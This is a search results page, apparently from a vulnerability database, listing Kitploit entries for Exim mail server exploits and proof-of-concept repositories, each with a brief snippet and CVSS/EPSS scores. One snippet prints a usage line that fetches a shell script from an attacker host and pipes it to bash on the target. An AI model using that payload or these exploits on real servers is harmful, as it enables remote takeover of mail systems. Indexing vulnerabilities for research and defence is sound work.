Lucene search
+L

2283 matches found

Kitploit
Kitploit
added 2026/09/13 12:07 p.m.6 views

nmap-nse-vulnerability-scripts

NMAP vulnerability scanning scripts A collection of nmap vulnerability scanning scripts to aid afforable detection and remediation. Background These scripts use the Nmap Scripting Engine NSE to implement checks for various vulnerabilities. References: https://nmap.org/book/man-nse.html...

7.4AI score
SaveExploits0References1
Kitploit
Kitploit
added 2026/09/13 11:43 a.m.4 views

exim-rce-quickfix

This repository does not have a README...

5.8AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/13 11:39 a.m.19 views

exim.exp

Exploit simple para vuln en exim 4.87 - 4.91 inclusive...

5.8AI score
SaveExploits0
Kitploit
Kitploit
added 2026/09/13 11:19 a.m.6 views

CVE-2019-10149

CVE-2019-10149 - Exim 4.87 Local/Makefile cp eximmonitor/EDITME Local/eximon.conf Crear usuario y grupo exim sudo groupadd -g 31 exim sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim Instalar dependencias sudo apt-get update sudo apt-get install -y make build-essential...

10CVSS8.3AI score0.99961EPSS
SaveExploits27References2
Kitploit
Kitploit
added 2026/09/13 10:36 a.m.6 views

CVE-2017-16943

CVE-2017-16943 Configuración del entorno root@kitploit: git clone https://github.com/Exim/exim.git git checkout 01c594601670c7e48e676d6c6d32d0f0084067fa cd ./exim/src mkdir Local wget "https://bugs.exim.org/attachment.cgi?id=1051" -O Makefile Modifique las variables de ruta y el nombre de usuario...

9.8CVSS8.3AI score0.46705EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/13 6:58 a.m.5 views

CVE-2019-10149

CVE-2019-10149 - Exim 4.87 Local/Makefile cp eximmonitor/EDITME Local/eximon.conf Crea el usuario y grupo exim sudo groupadd -g 31 exim sudo useradd -d /dev/null -c "Exim Daemon" -g exim -s /bin/false -u 31 exim Instala las dependencias sudo apt-get update sudo apt-get install -y make...

10CVSS8.3AI score0.99961EPSS
SaveExploits27References1
Kitploit
Kitploit
added 2026/09/13 6:52 a.m.3 views

eximrce-CVE-2019-10149

eximrce Simple python socket connection to test if exim is vulnerable to CVE-2019-10149. The payload simply touch a file in /root/lweximtest. Output will be slow depending on server's reply and not knowing how to properly use python's socket module. Would love a lesson on how to speed it up. Only...

10CVSS8.4AI score0.99961EPSS
SaveExploits27
Kitploit
Kitploit
added 2026/09/13 3:34 a.m.8 views

exim-cve-2019-10149-data

Recopilación de Datos de CVE de Exim Recopilación de Datos Relacionada con las Vulnerabilidades de Exim CVE-2019-10149, CVE-2019-15846, CVE-2019-16928 Anuncio de CVE: https://vulners.com/cve/CVE-2019-10149 Detalles del Exploit: https://www.exploit-db.com/exploits/46974 Cronología del Problema:...

10CVSS8.5AI score0.99961EPSS
SaveExploits29References1
Kitploit
Kitploit
added 2026/09/13 12:38 a.m.10 views

exim-vuln-poc

CVE-2018-6789...

9.8CVSS8.5AI score0.82137EPSS
SaveExploits19
Kitploit
Kitploit
added 2026/09/12 9:59 p.m.5 views

Exim-CVE-2019-10149

Exim-CVE-2019-10149 PoC for exploitation of vulnerability CVE-2019-10149 Usage example python3 PoC.py --rhost 192.168.1.100 --lhost 10.10.10.10 --lport 4444 --payload '/bin/sh -c wget http://10.10.10.10:8000/shell.sh -O - | bash'...

10CVSS8.4AI score0.99961EPSS
SaveExploits27
Kitploit
Kitploit
added 2026/09/12 9:34 p.m.5 views

CVE-2018-6789

CVE-2018-6789 Configuración del entorno Instalar dependencias root@kitploit: apt-get install gcc net-tools vim gdb python wget git make procps libpcre3-dev libdb-dev libxt-dev libxaw7-dev Descargar una versión antigua de exim root@kitploit: wget...

9.8CVSS8AI score0.82137EPSS
SaveExploits19
Kitploit
Kitploit
added 2026/09/12 7:44 p.m.8 views

CVE-2020-28018

CVE-2020-28018: Exim Use-after-free UAF leading to RCE Introduction There exists a Use-after-free UAF vulnerability in tls-openssl.c that allow remote unauthenticated attackers to corrupt internal memory data, thus finally achieving remote code execution. Primitives: Memory Leakage Arbitrary read...

9.8CVSS7.8AI score0.5675EPSS
SaveExploits3References1
Kitploit
Kitploit
added 2026/09/12 5:42 p.m.5 views

POC_CVE-2026-45185

CVE-2026-45185 Nuclei Template Validation Lab This repository is not a general-purpose exploit PoC repository. It is a local validation lab for reproducing and reviewing the behavior of a CVE-2026-45185 template intended for contribution to projectdiscovery/nuclei-templates. root@kitploit: The...

9.8CVSS8.4AI score0.01225EPSS
SaveExploits3
Kitploit
Kitploit
added 2026/09/12 1:09 p.m.9 views

CVE-2019-10149-Exim4-RCE

Cr.Exim 4.87 - 4.91 - Local Privilege Escalation Cr.Link: https://www.exploit-db.com/exploits/46996 1.This method requires you to first access the target machine with standard user privileges. 2.Once you have accessed the target machine, create a script file with the following content: vi raptor....

10CVSS8.4AI score0.99961EPSS
SaveExploits27
Kitploit
Kitploit
added 2026/09/12 6:35 a.m.6 views

PoC_CVE-2019-10149--rce

About Remote Command Execution into shell from a vulnerable exim service. Vulnerable versions go from 4.87 to 4.91 inclusive. Check https://nvd.nist.gov/vuln/detail/cve-2019-10149. The following script is based on Qualys PoC. Check...

10CVSS8.4AI score0.99961EPSS
SaveExploits27
Kitploit
Kitploit
added 2026/09/11 11:59 a.m.11 views

CVE-2026-45185

CVE-2026-45185 — Dead.Letter: Exim Heap UAF to Remote Root CVSS 9.8 Critical | Exim 4.97–4.99.2 | Ubuntu / GnuTLS builds | Unauthenticated Full write-up with GDB trace, step-by-step analysis, and global exposure data: https://0init.github.io/cve-2026-45185-dead-letter-exim-rce.html What is it...

9.8CVSS8.3AI score0.01225EPSS
SaveExploits3References1
Kitploit
Kitploit
added 2026/09/10 11:41 p.m.6 views

CVE-2025-26794-exploit

CVE-2025-26794: Exim ETRN SQL Injection Exploit A proof-of-concept exploit tool for CVE-2025-26794, demonstrating SQL injection vulnerability in Exim 4.98 mail server via the ETRN command when using SQLite DBM storage. ⚠️ Legal Disclaimer FOR AUTHORIZED SECURITY TESTING ONLY This tool is provided...

9.8CVSS7.8AI score0.77173EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/10 11:14 p.m.9 views

EXIM-4.87-CVE-2019-10149

EXIM-4.87-CVE-2019-10149 setup lab for educational purpose...

10CVSS8.4AI score0.99961EPSS
SaveExploits27
Kitploit
Kitploit
added 2026/09/10 6:15 p.m.19 views

CVE-2025-26794-Exim-Mail-SQLi

This repository does not have a README...

9.8CVSS7.6AI score0.77173EPSS
SaveExploits6
Kitploit
Kitploit
added 2026/09/10 5:30 p.m.5 views

CVE-2023-42115

CVE-2023-42115 Exim AUTH Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Exim. Authentication is not required to exploit this vulnerability. Build root@kitploit: git clone...

9.8CVSS8.3AI score0.09961EPSS
SaveExploits5
Rows per page
Query Builder